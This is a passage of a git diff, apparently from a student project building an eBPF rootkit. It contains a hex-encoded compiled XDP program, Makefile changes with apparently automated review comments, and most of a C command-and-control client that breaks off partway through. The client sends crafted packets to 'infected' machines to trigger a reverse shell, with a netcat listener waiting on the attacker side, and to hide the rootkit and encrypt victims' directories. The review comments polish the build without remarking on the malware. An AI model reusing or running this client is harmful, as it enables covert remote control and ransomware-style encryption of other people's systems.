\x74\x20\x21\x3d\x20\x6e\x74\x6f\x68\x73\x28\x35\x30\x30\x35\x29\x29\0\x20\x20\ \x28\x2a\x65\x74\x68\x29\x20\x3e\x20\x64\x61\x74\x61\x5f\x65\x6e\x64\x29\0\x20\
\x20\x20\x69\x66\x20\x28\x70\x61\x79\x6c\x6f\x61\x64\x5f\x73\x69\x7a\x65\x20\ \x20\x20\x20\x69\x66\x20\x28\x69\x70\x2d\x3e\x70\x72\x6f\x74\x6f\x63\x6f\x6c\
\x21\x3d\x20\x73\x69\x7a\x65\x6f\x66\x28\x6d\x61\x74\x63\x68\x5f\x70\x61\x74\ \x20\x21\x3d\x20\x49\x50\x50\x52\x4f\x54\x4f\x5f\x55\x44\x50\x29\0\x20\x20\x20\
\x74\x65\x72\x6e\x29\x20\x2d\x20\x31\x29\x20\0\x20\x20\x20\x20\x20\x20\x20\x20\ \x20\x69\x66\x20\x28\x75\x64\x70\x2d\x3e\x64\x65\x73\x74\x20\x21\x3d\x20\x6e\
\x69\x66\x20\x28\x70\x61\x79\x6c\x6f\x61\x64\x5b\x69\x5d\x20\x21\x3d\x20\x6d\ \x74\x6f\x68\x73\x28\x35\x30\x30\x35\x29\x29\0\x20\x20\x20\x20\x69\x66\x20\x28\
\x61\x74\x63\x68\x5f\x70\x61\x74\x74\x65\x72\x6e\x5b\x69\x5d\x29\0\x7d\0\x63\ \x70\x61\x79\x6c\x6f\x61\x64\x5f\x73\x69\x7a\x65\x20\x21\x3d\x20\x73\x69\x7a\
\x68\x61\x72\0\x4c\x49\x43\x45\x4e\x53\x45\0\x2e\x6d\x61\x70\x73\0\x6c\x69\x63\ \x65\x6f\x66\x28\x6d\x61\x74\x63\x68\x5f\x70\x61\x74\x74\x65\x72\x6e\x29\x20\
\x65\x6e\x73\x65\0\x9f\xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x1c\x01\ \x2d\x20\x31\x29\x20\0\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x28\x70\x61\
\0\0\x30\x01\0\0\0\0\0\0\x08\0\0\0\x9d\0\0\0\x01\0\0\0\0\0\0\0\x0e\0\0\0\x10\0\ \x79\x6c\x6f\x61\x64\x5b\x69\x5d\x20\x21\x3d\x20\x6d\x61\x74\x63\x68\x5f\x70\
\0\0\x9d\0\0\0\x11\0\0\0\0\0\0\0\xa1\0\0\0\xcd\0\0\0\x25\xd0\0\0\x08\0\0\0\xa1\ \x61\x74\x74\x65\x72\x6e\x5b\x69\x5d\x29\0\x7d\0\x20\x20\x20\x20\x62\x70\x66\
\0\0\0\xf7\0\0\0\x29\xcc\0\0\x10\0\0\0\xa1\0\0\0\x29\x01\0\0\x15\x0c\x01\0\x20\ \x5f\x70\x72\x69\x6e\x74\x6b\x28\x22\x42\x50\x46\x20\x66\x69\x6e\x69\x73\x68\
\0\0\0\xa1\0\0\0\x29\x01\0\0\x09\x0c\x01\0\x50\0\0\0\xa1\0\0\0\x58\x01\0\0\x09\ \x65\x64\x5c\x6e\x20\x22\x29\x3b\0\x63\x68\x61\x72\0\x5f\x5f\x41\x52\x52\x41\
\x28\x01\0\x68\0\0\0\xa1\0\0\0\x7d\x01\0\0\x0e\x44\x01\0\x70\0\0\0\xa1\0\0\0\ \x59\x5f\x53\x49\x5a\x45\x5f\x54\x59\x50\x45\x5f\x5f\0\x4c\x49\x43\x45\x4e\x53\
\x7d\x01\0\0\x09\x44\x01\0\x88\0\0\0\xa1\0\0\0\x9f\x01\0\0\x09\x5c\x01\0\xa0\0\ \x45\0\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\x2e\x5f\x5f\x5f\x5f\x66\x6d\
\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\x84\x01\0\xa8\0\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\ \x74\0\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\x2e\x5f\x5f\x5f\x5f\x66\x6d\
\x84\x01\0\xb0\0\0\0\xa1\0\0\0\xff\x01\0\0\x01\xbc\x01\0\xc0\0\0\0\xa1\0\0\0\ \x74\x2e\x31\0\x2e\x72\x6f\x64\x61\x74\x61\0\x6c\x69\x63\x65\x6e\x73\x65\0\x9f\
\xd3\x01\0\0\x0d\x84\x01\0\xc8\0\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\x84\x01\0\xd8\0\ \xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x4c\x01\0\0\x60\x01\0\0\0\0\0\
\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\x84\x01\0\xe0\0\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\ \0\x08\0\0\0\x75\0\0\0\x01\0\0\0\0\0\0\0\x07\0\0\0\x10\0\0\0\x75\0\0\0\x14\0\0\
\x84\x01\0\xe8\0\0\0\xa1\0\0\0\xd3\x01\0\0\x0d\x84\x01\0\xf8\0\0\0\xa1\0\0\0\ \0\0\0\0\0\x7e\0\0\0\xaa\0\0\0\0\xc4\0\0\x08\0\0\0\x7e\0\0\0\xce\0\0\0\x05\xcc\
\xd3\x01\0\0\x0d\x84\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \0\0\x30\0\0\0\x7e\0\0\0\xf1\0\0\0\x25\xd8\0\0\x38\0\0\0\x7e\0\0\0\x1b\x01\0\0\
\0\0\x7a\0\0\0\0\0\x02\0\xd8\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x72\0\0\0\0\0\x02\0\ \x29\xd4\0\0\x40\0\0\0\x7e\0\0\0\x4d\x01\0\0\x15\x14\x01\0\x50\0\0\0\x7e\0\0\0\
\x08\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x6b\0\0\0\0\0\x02\0\xc0\0\0\0\0\0\0\0\0\0\ \x4d\x01\0\0\x09\x14\x01\0\x80\0\0\0\x7e\0\0\0\x7c\x01\0\0\x09\x30\x01\0\x98\0\
\0\0\0\0\0\0\x64\0\0\0\0\0\x02\0\xb0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\ \0\0\x7e\0\0\0\xa1\x01\0\0\x0e\x4c\x01\0\xa0\0\0\0\x7e\0\0\0\xa1\x01\0\0\x09\
\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x5c\0\0\0\x11\0\x03\0\0\0\0\0\0\0\0\0\ \x4c\x01\0\xb8\0\0\0\x7e\0\0\0\xc3\x01\0\0\x09\x64\x01\0\xd0\0\0\0\x7e\0\0\0\
\x0d\0\0\0\0\0\0\0\x40\0\0\0\x11\0\x04\0\0\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x2c\ \xf7\x01\0\0\x0d\x90\x01\0\xd8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\xe0\0\
\0\0\0\x12\0\x02\0\0\0\0\0\0\0\0\0\x10\x01\0\0\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\ \0\0\x7e\0\0\0\x23\x02\0\0\x01\xcc\x01\0\xe8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\
\0\0\x07\0\0\0\xb0\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x2c\0\0\0\0\0\0\0\0\0\0\0\ \x90\x01\0\xf0\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\0\x01\0\0\x7e\0\0\0\
\x05\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x50\0\0\0\0\0\0\0\0\0\0\0\x05\0\ \xf7\x01\0\0\x0d\x90\x01\0\x08\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x10\
\0\0\x60\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x70\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\ \x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x18\x01\0\0\x7e\0\0\0\xf7\x01\0\0\
\x80\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x90\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\xa0\0\ \x0d\x90\x01\0\x20\x01\0\0\x7e\0\0\0\x25\x02\0\0\x05\x9c\x01\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\xb0\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\xc0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xa4\0\0\0\0\0\x02\0\0\x01\0\0\0\0\
\0\0\0\0\0\0\0\x05\0\0\0\xd0\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\xe0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\0\x87\0\0\0\0\0\x02\0\xe8\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x80\
\0\0\0\0\x05\0\0\0\xf0\0\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\x02\0\xe0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\x04\0\0\0\0\
\0\x05\0\0\0\x10\x01\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x20\x01\0\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\x0f\0\0\0\0\0\0\0\x8e\0\0\0\x01\0\x04\0\x0f\0\0\0\0\0\0\0\x0f\0\0\0\
\x05\0\0\0\x30\x01\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x40\x01\0\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\0\0\x03\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\x04\
\x05\0\0\0\x0e\x0c\x0d\0\x2e\x74\x65\x78\x74\0\x2e\x72\x65\x6c\x2e\x42\x54\x46\ \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x78\0\0\0\x11\0\x03\0\0\0\0\0\0\0\0\0\x0d\0\
\x2e\x65\x78\x74\0\x2e\x6d\x61\x70\x73\0\x78\x64\x70\0\x2e\x6c\x6c\x76\x6d\x5f\ \0\0\0\0\0\0\x43\0\0\0\x12\0\x02\0\0\0\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\x08\0\0\
\x61\x64\x64\x72\x73\x69\x67\0\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\0\ \0\0\0\0\0\x01\0\0\0\x07\0\0\0\x20\x01\0\0\0\0\0\0\x01\0\0\0\x07\0\0\0\x60\x01\
\x6c\x69\x63\x65\x6e\x73\x65\0\x72\x62\0\x2e\x73\x74\x72\x74\x61\x62\0\x2e\x73\ \0\0\0\0\0\0\x0a\0\0\0\x07\0\0\0\x6c\x01\0\0\0\0\0\0\x0a\0\0\0\x07\0\0\0\x84\
\x79\x6d\x74\x61\x62\0\x2e\x72\x65\x6c\x2e\x42\x54\x46\0\x4c\x49\x43\x45\x4e\ \x01\0\0\0\0\0\0\0\0\0\0\x08\0\0\0\x2c\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x40\0\0\
\x53\x45\0\x4c\x42\x42\x30\x5f\x39\0\x4c\x42\x42\x30\x5f\x37\0\x4c\x42\x42\x30\ \0\0\0\0\0\0\0\0\0\x06\0\0\0\x50\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x60\0\0\0\0\0\
\x5f\x31\x33\0\x4c\x42\x42\x30\x5f\x31\x30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\x06\0\0\0\x70\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x80\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \0\0\0\x06\0\0\0\x90\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\xa0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \x06\0\0\0\xb0\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\xc0\0\0\0\0\0\0\0\0\0\0\0\x06\0\
\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\ \0\0\xd0\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\
\0\0\0\x1a\0\0\0\x01\0\0\0\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\0\0\ \xf0\0\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x10\
\x10\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x08\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x38\0\0\ \x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x20\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x30\
\0\x01\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\x0d\0\0\0\0\ \x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x40\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x50\
\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\0\0\ \x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x60\x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x70\
\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x60\x01\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\0\0\0\ \x01\0\0\0\0\0\0\0\0\0\0\x06\0\0\0\x0f\x0e\x05\x06\0\x2e\x74\x65\x78\x74\0\x2e\
\0\0\0\0\0\x08\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x57\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\ \x72\x65\x6c\x2e\x42\x54\x46\x2e\x65\x78\x74\0\x78\x64\x70\x5f\x72\x65\x63\x65\
\0\0\0\0\0\0\0\0\0\x70\x01\0\0\0\0\0\0\xd4\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\ \x69\x76\x65\x2e\x5f\x5f\x5f\x5f\x66\x6d\x74\0\x2e\x72\x65\x6c\x78\x64\x70\x5f\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x0b\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\ \x70\x72\x6f\x67\0\x2e\x6c\x6c\x76\x6d\x5f\x61\x64\x64\x72\x73\x69\x67\0\x78\
\0\0\x44\x05\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\ \x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\0\x6c\x69\x63\x65\x6e\x73\x65\0\x2e\
\0\0\0\0\0\0\0\0\x4b\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x98\x06\0\ \x73\x74\x72\x74\x61\x62\0\x2e\x73\x79\x6d\x74\x61\x62\0\x2e\x72\x6f\x64\x61\
\0\0\0\0\0\xd8\0\0\0\0\0\0\0\x0b\0\0\0\x06\0\0\0\x08\0\0\0\0\0\0\0\x18\0\0\0\0\ \x74\x61\0\x2e\x72\x65\x6c\x2e\x42\x54\x46\0\x4c\x49\x43\x45\x4e\x53\x45\0\x4c\
\0\0\0\x53\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x70\x07\0\0\0\0\0\0\ \x42\x42\x30\x5f\x39\0\x4c\x42\x42\x30\x5f\x37\0\x78\x64\x70\x5f\x72\x65\x63\
\x20\0\0\0\0\0\0\0\x07\0\0\0\x05\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x07\ \x65\x69\x76\x65\x2e\x5f\x5f\x5f\x5f\x66\x6d\x74\x2e\x31\0\x4c\x42\x42\x30\x5f\
\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x90\x07\0\0\0\0\0\0\x20\x01\0\ \x31\x30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\x07\0\0\0\x06\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x1e\0\0\0\ \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\
\x03\x4c\xff\x6f\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\0\0\xb0\x08\0\0\0\0\0\0\x03\0\0\ \0\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x43\0\0\0\x03\0\0\ \0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x2c\0\0\0\x01\0\0\0\x06\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb3\x08\0\0\0\0\0\0\x82\0\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x08\0\
\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"; \0\0\0\0\0\0\0\0\0\0\0\0\0\0\x4f\0\0\0\x01\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\x90\x01\0\0\0\0\0\0\x0d\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\x67\0\0\0\x01\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9d\x01\0\
\0\0\0\0\0\x1e\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\x73\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xbb\x01\0\0\0\0\0\0\x2f\
\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x0b\0\0\0\
\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xea\x05\0\0\0\0\0\0\x80\x01\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x5f\0\0\0\x02\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x70\x07\0\0\0\0\0\0\xf0\0\0\0\0\0\0\0\x0c\0\0\0\
\x08\0\0\0\x08\0\0\0\0\0\0\0\x18\0\0\0\0\0\0\0\x28\0\0\0\x09\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\x60\x08\0\0\0\0\0\0\x20\0\0\0\0\0\0\0\x07\0\0\0\x02\0\0\0\
\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x6f\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\x80\x08\0\0\0\0\0\0\x30\0\0\0\0\0\0\0\x07\0\0\0\x05\0\0\0\x08\0\0\0\
\0\0\0\0\x10\0\0\0\0\0\0\0\x07\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\xb0\x08\0\0\0\0\0\0\x50\x01\0\0\0\0\0\0\x07\0\0\0\x06\0\0\0\x08\0\0\0\0\0\0\0\
\x10\0\0\0\0\0\0\0\x35\0\0\0\x03\x4c\xff\x6f\0\0\0\x80\0\0\0\0\0\0\0\0\0\0\0\0\
\0\x0a\0\0\0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\x57\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\x0a\0\0\0\0\0\
\0\xac\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
return 0; return 0;
err: err:


@@ -16,7 +16,7 @@ INCLUDES := -I$(OUTPUT) -I./libbpf/include/uapi -I/lib/modules/5.11.0-40-generic
CFLAGS := -g -Wall #-I/lib/modules/5.11.0-40-generic/build/include CFLAGS := -g -Wall #-I/lib/modules/5.11.0-40-generic/build/include
ARCH := $(shell uname -m | sed 's/x86_64/x86/') ARCH := $(shell uname -m | sed 's/x86_64/x86/')
APPS = xdp_filter APPS = xdp_filter bootstrap
# Get Clang's default includes on this system. We'll explicitly add these dirs # Get Clang's default includes on this system. We'll explicitly add these dirs
# to the includes list when compiling with `-target bpf` because otherwise some # to the includes list when compiling with `-target bpf` because otherwise some
@@ -64,7 +64,7 @@ $(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPU
install install
# Build BPF code # Build BPF code
$(OUTPUT)/%.bpf.o: $(EBPF)/%.bpf.c $(LIBBPF_OBJ) $(wildcard $(EBPF)/%.h) $(VMLINUX) | $(OUTPUT) $(OUTPUT)/%.bpf.o: $(EBPF)/%.bpf.c $(LIBBPF_OBJ) $(wildcard $(EBPF)/%.h) | $(OUTPUT)
$(call msg,BPF,$@) $(call msg,BPF,$@)
$(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) -c $(filter %.c,$^) -o $@ $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) -c $(filter %.c,$^) -o $@
$(Q)$(LLVM_STRIP) -g $@ # strip useless DWARF info $(Q)$(LLVM_STRIP) -g $@ # strip useless DWARF info
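Review bot: The `$(OUTPUT)/%.bpf.o` pattern rule no longer lists `$(VMLINUX)` as a prerequisite, so make will neither build nor track whatever that variable names before compiling the BPF objects; if any source under `$(EBPF)` still includes it (not visible in this hunk), a clean build can fail or silently pick up a stale copy. The context line for INCLUDES also shows a path pinned to `/lib/modules/5.11.0-40-generic`, so the objects are presumably now compiled against one specific kernel's installed headers. If that is intended, record it above the rule with a comment such as `# $(VMLINUX) intentionally not a prerequisite: BPF sources build against installed kernel headers`, and derive the module path from `$(shell uname -r)` instead of a literal version. The rest of the Makefile lies outside the visible hunks.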

Binary file not shown.

Binary file not shown.

16
src/client/Makefile Normal file

@@ -0,0 +1,16 @@
CC = gcc
HEADERS = lib/RawTCP.h
EXTRA_CFLAGS= -I$(PWD)/lib
default:
make injector
client.o: client.c $(HEADERS)
gcc -c client.c
injector: client.o lib/libRawTCP_Lib.a
gcc -lm -o injector client.o -L. lib/libRawTCP_Lib.a
clean:
-rm -f client.o
-rm -f injector
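Review bot: The `client.o` rule runs a bare `gcc -c client.c`, so the `CC` and `EXTRA_CFLAGS` variables defined at the top are never used and the object is built with no warnings enabled, which hides type and bounds mistakes in code that parses addresses and copies into fixed-size buffers. Suggest `$(CC) $(CFLAGS) $(EXTRA_CFLAGS) -Wall -Wextra -c client.c` for the compile step and `$(CC) -o injector client.o lib/libRawTCP_Lib.a -lm` for the link, with libraries placed after the objects that reference them. `lib/libRawTCP_Lib.a` has no rule here and is presumably one of the binary files committed alongside, so it cannot be audited from this diff; building it from source or pinning a checksum would make the dependency reviewable. `default` should call `$(MAKE) injector` rather than `make`, and `default` and `clean` should be declared `.PHONY`.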

294
src/client/client.c Normal file

@@ -0,0 +1,294 @@
#include "lib/RawTCP.h"
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
// For printing with colors
#define KGRN "\x1B[32m"
#define KYLW "\x1B[33m"
#define KBLU "\x1B[34m"
#define KMGN "\x1B[35m"
#define KRED "\x1B[31m"
#define RESET "\x1B[0m"
void print_welcome_message(){
printf("*******************************************************\n");
printf("************************* TFG *************************\n");
printf("*******************************************************\n");
printf("************ https://github.com/h3xduck/TFG ***********\n");
printf("*******************************************************\n");
}
void print_help_dialog(const char* arg){
printf("\nUsage: %s OPTION victim_IP\n\n", arg);
printf("Program OPTIONs\n");
char* line = "-S";
char* desc = "Send a secret message to IP";
printf("\t%-40s %-50s\n\n", line, desc);
line = "-h";
desc = "Print this help";
printf("\t%-40s %-50s\n\n", line, desc);
}
void check_ip_address_format(char* address){
char* buf[256];
int s = inet_pton(AF_INET, address, buf);
if(s<0){
printf("["KYLW"WARN"RESET"]""Error checking IP validity\n");
}else if(s==0){
printf("["KYLW"WARN"RESET"]""The victim IP is probably not valid\n");
}
}
char* getLocalIpAddress(){
char hostbuffer[256];
char* IPbuffer = calloc(256, sizeof(char));
struct hostent *host_entry;
int hostname;
hostname = gethostname(hostbuffer, sizeof(hostbuffer));
if(hostname==-1){
perror("["KRED"ERROR"RESET"]""Error getting local IP: gethostname");
exit(1);
}
host_entry = gethostbyname(hostbuffer);
if(host_entry == NULL){
perror("["KRED"ERROR"RESET"]""Error getting local IP: gethostbyname");
exit(1);
}
// To convert an Internet network
// address into ASCII string
strcpy(IPbuffer,inet_ntoa(*((struct in_addr*) host_entry->h_addr_list[0])));
printf("["KBLU"INFO"RESET"]""Attacker IP selected: %s\n", IPbuffer);
return IPbuffer;
}
void get_shell(char* argv){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_PAYLOAD_GET_REVERSE_SHELL");
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
pid_t pid;
pid = fork();
if(pid < 0){
perror("["KRED"ERROR"RESET"]""Could not create another process");
return;
}else if(pid==0){
sleep(1);
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Payload successfully sent!\n");
}
}else {
//Activating listener
char *cmd = "nc";
char *argv[4];
argv[0] = "nc";
argv[1] = "-lvp";
argv[2] = "5888";
argv[3] = NULL;
printf("["KBLU"INFO"RESET"]""Trying to get a shell...\n");
if(execvp(cmd, argv)<0){
perror("["KRED"ERROR"RESET"]""Error executing background listener");
return;
}
printf("["KGRN"OK"RESET"]""Got a shell\n");
}
free(local_ip);
}
void show_rootkit(char* argv){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_SHOW_ROOTKIT");
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Request to unhide successfully sent!\n");
}
free(local_ip);
}
void hide_rootkit(char* argv){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_HIDE_ROOTKIT");
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Request to hide successfully sent!\n");
}
free(local_ip);
}
void encrypt_directory(char* argv, char* dir){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir);
char data_buffer[1024];
strcpy(data_buffer, "UMBRA_ENCRYPT_DIR");
strcat(data_buffer, dir);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer);
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
//Sending the malicious payload
if(rawsocket_send(packet)<0){
printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
}else{
printf("["KGRN"OK"RESET"]""Request to encrypt directory successfully sent!\n");
}
free(local_ip);
}
void decrypt_directory(char* argv, char* dir){
char* local_ip = getLocalIpAddress();
printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir);
char data_buffer[1024];
strcpy(data_buffer, "UMBRA_DECRYPT_DIR");
strcat(data_buffer, dir);
check_ip_address_format(argv);
packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer);
